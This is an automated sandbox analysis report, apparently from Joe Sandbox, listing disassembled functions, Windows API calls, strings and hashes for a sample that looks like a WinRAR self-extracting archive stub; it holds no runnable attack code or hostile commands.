C:\Users\user\Desktop, xrefs: 0101BBC9

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 3445078344-311033401
Opcode ID: 444c392e30a4961383dac8885afb0d4371368f26e53c519e77f6ab95012464e9
Instruction ID: 3ca8557b03994eac0f4a78719fc2f2576b3f7e2568d545669a07dc4b5598366f
Opcode Fuzzy Hash: 444c392e30a4961383dac8885afb0d4371368f26e53c519e77f6ab95012464e9
Instruction Fuzzy Hash: F242FC70944245BBFB329BA4DD49FBE7BBCAB41700F004099F6C5AA0C9CB7E9944CB61

Function 01010863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 0101087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0101088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 010108BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 01010B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01010B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 01010B93
ReadFile.KERNEL32(00000000,?,00007FFE,01033C7C,00000000), ref: 01010BB1
CloseHandle.KERNEL32(00000000), ref: 01010C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 01010C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,01033C7C,?,00000000,?,00000800), ref: 01010C72
GetFileAttributesW.KERNELBASE(?,?,01033C7C,00000800,?,00000000,?,00000800), ref: 01010C9C
GetFileAttributesW.KERNEL32(?,?,01033D44,00000800), ref: 01010CD8

Part of subcall function 0101081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 01010836
Part of subcall function 0101081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0100F2D8,Crypt32.dll,00000000,0100F35C,?,?,0100F33E,?,?,?), ref: 01010858

_swprintf.LIBCMT ref: 01010D4A
_swprintf.LIBCMT ref: 01010D96

Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5

AllocConsole.KERNEL32 ref: 01010D9E
GetCurrentProcessId.KERNEL32 ref: 01010DA8
AttachConsole.KERNEL32(00000000), ref: 01010DAF
_wcslen.LIBCMT ref: 01010DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 01010DD5
WriteConsoleW.KERNEL32(00000000), ref: 01010DDC
Sleep.KERNEL32(00002710), ref: 01010DE7
FreeConsole.KERNEL32 ref: 01010DED
ExitProcess.KERNEL32 ref: 01010DF5

Strings

uxtheme.dll, xrefs: 01010D17
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 01010D84
dwmapi.dll, xrefs: 01010927, 01010D0D
SetDllDirectoryW, xrefs: 01010888
kernel32, xrefs: 01010873
SetDefaultDllDirectories, xrefs: 010108B9
DXGIDebug.dll, xrefs: 010108FC, 01010C5E

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1207345701-3298887752
Opcode ID: b0e39c976c49ef3a2a4690eff0a45dbab010ab1bd5406a22c2b7ee2b66c3ec1d
Instruction ID: a00075720e099a0a5763cc4b07fda85e429c3e1a2598b1ee9b278207c0abeed2
Opcode Fuzzy Hash: b0e39c976c49ef3a2a4690eff0a45dbab010ab1bd5406a22c2b7ee2b66c3ec1d
Instruction Fuzzy Hash: 1ED16EB1108385AFD235AF55D888BDFBAECBBC5704F40491DF6C99E144CB398589CBA2

Function 0101C73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0101C744

Part of subcall function 0101B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0101B3FB

_wcslen.LIBCMT ref: 0101CA0A
_wcslen.LIBCMT ref: 0101CA13
SetWindowTextW.USER32(?,?), ref: 0101CA71
_wcslen.LIBCMT ref: 0101CAB3
_wcsrchr.LIBVCRUNTIME ref: 0101CBFB
GetDlgItem.USER32(?,00000066), ref: 0101CC36
SetWindowTextW.USER32(00000000,?), ref: 0101CC46
SendMessageW.USER32(00000000,00000143,00000000,0104A472), ref: 0101CC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0101CC7F

Strings

%s.%d.tmp, xrefs: 0101C940
<br>, xrefs: 0101C9D4
ProgramFilesDir, xrefs: 0101CB45
Software\Microsoft\Windows\CurrentVersion, xrefs: 0101CB1A

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 2804936435-312220925
Opcode ID: 93d796861626222b25c6fcc9c6e176eb62d0eea3509c693ce24bb5c83fead3ea
Instruction ID: e6db691cefd8ca8a875add66c14126a9a7072d941056ed0adb8c4b6cead1a4d9
Opcode Fuzzy Hash: 93d796861626222b25c6fcc9c6e176eb62d0eea3509c693ce24bb5c83fead3ea
Instruction Fuzzy Hash: 3BE15672940219AAEF25DBA4DD84DEF77BDAB04310F4484A5F689E7044EF78DA848F60

Function 0100DA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0100DA70
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0100DAAC

Part of subcall function 0100C29A: _wcslen.LIBCMT ref: 0100C2A2

Part of subcall function 010105DA: _wcslen.LIBCMT ref: 010105E0

Part of subcall function 01011B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0100BAE9,00000000,?,?,?,00010442), ref: 01011BA0

_wcslen.LIBCMT ref: 0100DDE9
__fprintf_l.LIBCMT ref: 0100DF1C

Strings

, xrefs: 0100DD6C
*messages***, xrefs: 0100DBFA
a, xrefs: 0100DC16
$%s:, xrefs: 0100DEFF
@%s:, xrefs: 0100DF06, 0100DF12
RTL, xrefs: 0100DEDE
,, xrefs: 0100DF57
*messages***, xrefs: 0100DBC1
R, xrefs: 0100DC0C

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 566448164-801612888
Opcode ID: 554de2427842ed7f446fe33208488465e51625522866402fced92810f7aebd37
Instruction ID: 10198a46e4c69a33095d90e25fc94161ad86905a06cce3ab82b0c1cdb0c49dbe
Opcode Fuzzy Hash: 554de2427842ed7f446fe33208488465e51625522866402fced92810f7aebd37
Instruction Fuzzy Hash: 6332F571900219DBEF66EFA8C840BEE77A5FF58300F40459AFA85AB2C1E771D985CB50

Function 0101D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0101B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101B579
Part of subcall function 0101B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101B58A
Part of subcall function 0101B568: IsDialogMessageW.USER32(00010442,?), ref: 0101B59E
Part of subcall function 0101B568: TranslateMessage.USER32(?), ref: 0101B5AC
Part of subcall function 0101B568: DispatchMessageW.USER32(?), ref: 0101B5B6

GetDlgItem.USER32(00000068,0105FCB8), ref: 0101D4E8
ShowWindow.USER32(00000000,00000005,?,?,?,0101AF07,00000001,?,?,0101B7B9,0103506C,0105FCB8,0105FCB8,00001000,00000000,00000000), ref: 0101D510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0101D51B
SendMessageW.USER32(00000000,000000C2,00000000,010335F4), ref: 0101D529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0101D53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0101D559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0101D59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0101D5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0101D5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0101D5E1
SendMessageW.USER32(00000000,000000C2,00000000,010343F4), ref: 0101D5F0

Strings

\, xrefs: 0101D549

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: ea5c29c5deaeae0f865de473f1f5e19640bd9c9fef6064a7ba4ad9a71192ebb7
Instruction ID: c9aa6529565a70fbb63a8f8a88daa3aff777f91894fdf6d2c519e8e4b290dabb
Opcode Fuzzy Hash: ea5c29c5deaeae0f865de473f1f5e19640bd9c9fef6064a7ba4ad9a71192ebb7
Instruction Fuzzy Hash: 2E31C171545341ABE321DF249C5AFAB7FACFB82704F00090DFAD59A194DB6A890887B6

Function 0101D78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 0101D7AE
ShellExecuteExW.SHELL32(?), ref: 0101D8DE
ShowWindow.USER32(?,00000000), ref: 0101D91D
GetExitCodeProcess.KERNEL32(?,?), ref: 0101D959
CloseHandle.KERNEL32(?), ref: 0101D97F
ShowWindow.USER32(?,00000001), ref: 0101D9E1

Strings

.exe, xrefs: 0101D989
.inf, xrefs: 0101D89A

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf
API String ID: 36480843-3750412487
Opcode ID: 8ecd2789f0b6423568e9c909e6581cf00bc1aa696b3821e235f0f566fc83cddb
Instruction ID: c4ee4b496d4d3682530d07e2f1b62b099e617e5530fc4bf4c4aa353c1e57ac78
Opcode Fuzzy Hash: 8ecd2789f0b6423568e9c909e6581cf00bc1aa696b3821e235f0f566fc83cddb
Instruction Fuzzy Hash: 5F510770404380AAFB719FA8D448BAB7FE6AF81744F04049EFAC89B199D77DC544CB52

Function 0102A95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,01025695,01025695,?,?,?,0102ABAC,00000001,00000001,2DE85006), ref: 0102A9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0102ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0102AA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0102AB35
__freea.LIBCMT ref: 0102AB42

Part of subcall function 01028E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0102CA2C,00000000,?,01026CBE,?,00000008,?,010291E0,?,?,?), ref: 01028E38

__freea.LIBCMT ref: 0102AB4B
__freea.LIBCMT ref: 0102AB70

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 7327624c73253e190ce44aaa8aa14dc7a6cceaf8a9f886762efc39c16522b25f
Instruction ID: e17c86f3446af1b8c4c6623feef010b685c642ecf620bf1de52a145ebc82628d
Opcode Fuzzy Hash: 7327624c73253e190ce44aaa8aa14dc7a6cceaf8a9f886762efc39c16522b25f
Instruction Fuzzy Hash: 1B51B472700226EFEB268E68CC51EAFBBEAEB44610B154A69FD84D7542DF34DC50C650

Function 01023B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,01023C35,?,?,01062088,00000000,?,01023D60,00000004,InitializeCriticalSectionEx,01036394,InitializeCriticalSectionEx,00000000), ref: 01023C03

Strings

api-ms-, xrefs: 01023BC3

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 599c4b34abc17fc5aceb73388bc4da6cfbe1af06dde01334e37a4d6efd649e0e
Instruction ID: 315f4e2644b309b458b7cef3ff9711bcc3eb08a1390a7496eea3b5bbdac81b15
Opcode Fuzzy Hash: 599c4b34abc17fc5aceb73388bc4da6cfbe1af06dde01334e37a4d6efd649e0e
Instruction Fuzzy Hash: 7211C435A04235ABDB338E6C9C8079D77A8BB09660F110150FAD1EF284D72AE90087D0

Function 0101ABAB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 0101ABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 0101ABF9

Part of subcall function 01011FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0100C116,00000000,.exe,?,?,00000800,?,?,?,01018E3C), ref: 01011FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0101ABE9

Strings

@Ut, xrefs: 0101ABF9
EDIT, xrefs: 0101ABCD, 0101ABD8, 0101ABE5

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: @Ut$EDIT
API String ID: 4243998846-2065656831
Opcode ID: 86de5f6d80f81292089be0f9fa0cbee86a432fd47430bfbb1b137826b0144c57
Instruction ID: fdef43b3eb64f9e5ee46f2791b8f376966dc1bd59d8439ba5046b73dfb4533c0
Opcode Fuzzy Hash: 86de5f6d80f81292089be0f9fa0cbee86a432fd47430bfbb1b137826b0144c57
Instruction Fuzzy Hash: 57F0E232701268BAEA3056289C09FDB7AACAB42B00F080451FA84E71C8D769D94586F5

Function 0101AC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0101081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 01010836
Part of subcall function 0101081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0100F2D8,Crypt32.dll,00000000,0100F35C,?,?,0100F33E,?,?,?), ref: 01010858

OleInitialize.OLE32(00000000), ref: 0101AC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0101AC66
SHGetMalloc.SHELL32(01048438), ref: 0101AC70

Strings

riched20.dll, xrefs: 0101AC1E
3Qo, xrefs: 0101AC47

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3Qo
API String ID: 3498096277-4232643773
Opcode ID: 0fe0dd0385b83f586036c834b8b4a59d25bbb7c93649087f95d637606c0f259e
Instruction ID: de0c2c066df0be36b2813305af08cdc1cff539e17a37911c3627e3cde9ae58f5
Opcode Fuzzy Hash: 0fe0dd0385b83f586036c834b8b4a59d25bbb7c93649087f95d637606c0f259e
Instruction Fuzzy Hash: 90F012B1D0020AABDB10AFA9D8489DFFFFCFF94700F00415AE895E6205DBB856458FA1

Function 010098E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,01007760,?,00000005,?,00000011), ref: 0100995F
GetLastError.KERNEL32(?,?,01007760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0100996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,01007760,?,00000005,?), ref: 010099A2
GetLastError.KERNEL32(?,?,01007760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 010099AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,01007760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 010099F9

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 90714439f0d53719f423eb5ac3446cfff8c8579aad18826f0aab7c5877752a00
Instruction ID: 222b96d065fb82373c182a2d9a11c53edd2b75b0e7c213ac18208096a4d53eee
Opcode Fuzzy Hash: 90714439f0d53719f423eb5ac3446cfff8c8579aad18826f0aab7c5877752a00
Instruction Fuzzy Hash: 0F31F3305447466FF7329B2CCD85BDABBD8BB44324F100B19FAE9961C2D7A9A484CB91

Function 0101B568 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101B579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101B58A
IsDialogMessageW.USER32(00010442,?), ref: 0101B59E
TranslateMessage.USER32(?), ref: 0101B5AC
DispatchMessageW.USER32(?), ref: 0101B5B6

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: cbeb2090ebcb233e1ee31587ddbb6687d4271b7f762d8560e5861f5fb4a6348f
Instruction ID: 1633354f7ded88808f9f7caf4b745224206bf1a6314bb01919f5ab00f27dd280
Opcode Fuzzy Hash: cbeb2090ebcb233e1ee31587ddbb6687d4271b7f762d8560e5861f5fb4a6348f
Instruction Fuzzy Hash: 2AF0BD71A0111ABB9B309BE59D5CEDB7FBCEE052917004415F549D6018EB3DD109CBF0

Function 0102BA27 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 010297E5: GetLastError.KERNEL32(?,01041030,01024674,01041030,?,?,01023F73,00000050,?,01041030,00000200), ref: 010297E9
Part of subcall function 010297E5: _free.LIBCMT ref: 0102981C
Part of subcall function 010297E5: SetLastError.KERNEL32(00000000,?,01041030,00000200), ref: 0102985D
Part of subcall function 010297E5: _abort.LIBCMT ref: 01029863

Part of subcall function 0102BB4E: _abort.LIBCMT ref: 0102BB80
Part of subcall function 0102BB4E: _free.LIBCMT ref: 0102BBB4

Part of subcall function 0102B7BB: GetOEMCP.KERNEL32(00000000,?,?,0102BA44,?), ref: 0102B7E6

_free.LIBCMT ref: 0102BA9F
_free.LIBCMT ref: 0102BAD5

Strings

x)J, xrefs: 0102BB1E
x)J, xrefs: 0102BB19

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
